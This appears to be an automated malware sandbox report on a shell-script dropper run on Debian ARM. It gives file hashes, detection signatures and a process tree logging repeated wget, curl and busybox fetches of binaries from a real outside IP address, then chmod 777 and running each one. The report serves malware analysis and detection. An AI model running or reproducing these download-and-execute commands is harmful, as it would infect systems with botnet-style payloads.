Analysis
-
max time kernel
34s -
max time network
51s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
18/10/2024, 01:59
Static task
static1
Behavioral task
behavioral1
Sample
7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh
-
Size
10KB
-
MD5
d08f4f01c6ec9c67ead46ab98f031a55
-
SHA1
cac804b670bc7011aff98353a06d5906917e496a
-
SHA256
7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514
-
SHA512
be5c70e0361500fe82048f5f3cc74bd6019fa75dc8edd3d43bdc5cf875e01e8b9a0f7922e67c42ea1a96e8821f8997c3b73c2f019b571a3ca202dc155e6bbbc7
-
SSDEEP
192:JKto885QciICt1xQYUHgw6AtXj89F6UnrPCJpBrPCJpM21xBA885QcozXj89FWY3:JKG885QciICt1xOUnrPCJpBrPCJpM21M
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 12 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 767 chmod 817 chmod 832 chmod 683 chmod 735 chmod 721 chmod 748 chmod 777 chmod 786 chmod 801 chmod 694 chmod 700 chmod -
Executes dropped EXE 12 IoCs
ioc pid Process /tmp/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c 684 0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c /tmp/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq8 695 EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq8 /tmp/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA 701 4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA /tmp/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL 723 fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL /tmp/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD 736 1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD /tmp/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj 750 6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj /tmp/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs 769 AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs /tmp/djVle6T71YXXfjsEnSm4CZ6stk0wE9n003 778 djVle6T71YXXfjsEnSm4CZ6stk0wE9n003 /tmp/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp 787 G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp /tmp/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN 802 Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN /tmp/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z 818 ukydHV98yzuiaTZfLkSAjstPpW905BtH3z /tmp/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h 833 wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h -
Checks CPU configuration 1 TTPs 12 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl -
Writes file to tmp directory 12 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h curl File opened for modification /tmp/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA curl File opened for modification /tmp/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD curl File opened for modification /tmp/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj curl File opened for modification /tmp/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs curl File opened for modification /tmp/djVle6T71YXXfjsEnSm4CZ6stk0wE9n003 curl File opened for modification /tmp/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp curl File opened for modification /tmp/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z curl File opened for modification /tmp/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c curl File opened for modification /tmp/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq8 curl File opened for modification /tmp/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL curl File opened for modification /tmp/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN curl
Processes
-
/tmp/7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh/tmp/7477bdc50195f9712b6e4ff13cd7b824e27bca345d73948c021d987b5d244514.sh1⤵PID:656
-
/bin/rm/bin/rm bins.sh2⤵PID:662
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵PID:664
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:671
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵PID:680
-
-
/bin/chmodchmod 777 0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵
- File and Directory Permissions Modification
PID:683
-
-
/tmp/0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c./0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵
- Executes dropped EXE
PID:684
-
-
/bin/rmrm 0lHfL4npowzS4jGTj1i4u7HGUOFeLOPy1c2⤵PID:686
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵PID:688
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:691
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵PID:693
-
-
/bin/chmodchmod 777 EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵
- File and Directory Permissions Modification
PID:694
-
-
/tmp/EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq8./EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵
- Executes dropped EXE
PID:695
-
-
/bin/rmrm EIbvlORrRhzsiyIXJh6ptRhv8eZurOtGq82⤵PID:696
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵PID:697
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:698
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵PID:699
-
-
/bin/chmodchmod 777 4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵
- File and Directory Permissions Modification
PID:700
-
-
/tmp/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA./4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵
- Executes dropped EXE
PID:701
-
-
/bin/rmrm 4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵PID:702
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵PID:704
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:708
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵PID:718
-
-
/bin/chmodchmod 777 fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵
- File and Directory Permissions Modification
PID:721
-
-
/tmp/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL./fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵
- Executes dropped EXE
PID:723
-
-
/bin/rmrm fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵PID:724
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵PID:725
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:728
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵PID:732
-
-
/bin/chmodchmod 777 1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵
- File and Directory Permissions Modification
PID:735
-
-
/tmp/1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD./1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵
- Executes dropped EXE
PID:736
-
-
/bin/rmrm 1EBVtN1Fws7MEdUaqLMe02UHZCniNB8wTD2⤵PID:737
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵PID:739
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:742
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵PID:746
-
-
/bin/chmodchmod 777 6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj./6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵
- Executes dropped EXE
PID:750
-
-
/bin/rmrm 6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵PID:751
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵PID:752
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:758
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵PID:765
-
-
/bin/chmodchmod 777 AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵
- File and Directory Permissions Modification
PID:767
-
-
/tmp/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs./AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵
- Executes dropped EXE
PID:769
-
-
/bin/rmrm AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵PID:770
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵PID:771
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:774
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵PID:776
-
-
/bin/chmodchmod 777 djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵
- File and Directory Permissions Modification
PID:777
-
-
/tmp/djVle6T71YXXfjsEnSm4CZ6stk0wE9n003./djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵
- Executes dropped EXE
PID:778
-
-
/bin/rmrm djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵PID:779
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵PID:780
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:781
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵PID:784
-
-
/bin/chmodchmod 777 G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵
- File and Directory Permissions Modification
PID:786
-
-
/tmp/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp./G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵
- Executes dropped EXE
PID:787
-
-
/bin/rmrm G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵PID:788
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵PID:790
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:793
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵PID:798
-
-
/bin/chmodchmod 777 Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵
- File and Directory Permissions Modification
PID:801
-
-
/tmp/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN./Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵
- Executes dropped EXE
PID:802
-
-
/bin/rmrm Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵PID:803
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵PID:804
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:811
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵PID:814
-
-
/bin/chmodchmod 777 ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵
- File and Directory Permissions Modification
PID:817
-
-
/tmp/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z./ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵
- Executes dropped EXE
PID:818
-
-
/bin/rmrm ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵PID:820
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵PID:821
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:824
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵PID:829
-
-
/bin/chmodchmod 777 wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵
- File and Directory Permissions Modification
PID:832
-
-
/tmp/wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h./wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵
- Executes dropped EXE
PID:833
-
-
/bin/rmrm wT5Da5WeDrvhjdwXdgOgq5Q3BGfGX9Da7h2⤵PID:834
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FXSwQZfSDGeAuZsXY2OR6W3MpaBwxnTF1a2⤵PID:836
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97